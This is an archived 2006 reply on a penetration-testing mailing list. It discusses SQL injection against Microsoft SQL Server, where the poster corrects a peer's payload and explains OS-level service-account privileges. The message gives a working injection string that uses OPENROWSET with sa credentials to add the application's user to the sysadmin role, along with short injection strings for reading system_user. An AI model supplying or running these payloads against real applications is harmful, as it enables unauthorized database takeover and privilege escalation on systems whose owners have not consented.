RE: custom xp_cmdshell on SQL Server

From: Victor Chapela (victor@sm4rt.com)
Date: Tue Sep 19 2006 - 20:20:32 EDT

• Next message: s-williams@nyc.rr.com: "Pen-Testing Smoothwall FireWall"
• Previous message: winlefu: "Ethical Hacking online course"
• In reply to: Andy Lester: "RE: custom xp_cmdshell on SQL Server"
• Next in thread: Andy Lester: "RE: custom xp_cmdshell on SQL Server"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Andy,

> Correct. But since I am injecting 'CREATE PROCEDURE' inside
> an OPENROWSET statement, that should solve the issue, as the
> SQL code inside the OPENROWSET is executed as a batch in
> itself (correct me if I am wrong)

You may be right and that would be a nice workaround for the create
procedure lockout. Have you tried it locally with openrowset and does it
work?

> I am running my code as an unprivileged user, but I escalated
> to 'sa' using OPENROWSET

But I mean an unprivileged OS user. SQL Server not always runs as NT
Authority/SYSTEM. If you are 'SA' you inherit SQL Server's privileges and at
the operating system level you can still be "guest" or more frequently an
account named sql_server or something (which may not have access to
executing system32 binaries).

> ' and 1=(select * from
> openrowset('SQLOLEDB','DRIVER={SQLServer};SERVER=<server>;UID
> =sa;PWD=<password>',N'select user; declare @u varchar(50); set @u =
(select
> >rd>system_user); exec master.dbo.sp_addsrvrolemember @u,
''sysadmin'''))--

There is an error in this query I sent you. You should avoid declaring the
variable because it is being set within the context of the openrowset query:
you will be adding SA to sysadmin the way it is. Try it this way:

' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer};
SERVER=<server>;UID=sa;PWD=<password>',N'select user; exec
master.dbo.sp_addsrvrolemember <app user>, ''sysadmin'''))--

Obtain <app user> with [' and 1=system_user --] or [' and 1=user --] In this
case both should be the same.

Regards,
Victor

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------

• Next message: s-williams@nyc.rr.com: "Pen-Testing Smoothwall FireWall"
• Previous message: winlefu: "Ethical Hacking online course"
• In reply to: Andy Lester: "RE: custom xp_cmdshell on SQL Server"
• Next in thread: Andy Lester: "RE: custom xp_cmdshell on SQL Server"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:59 EDT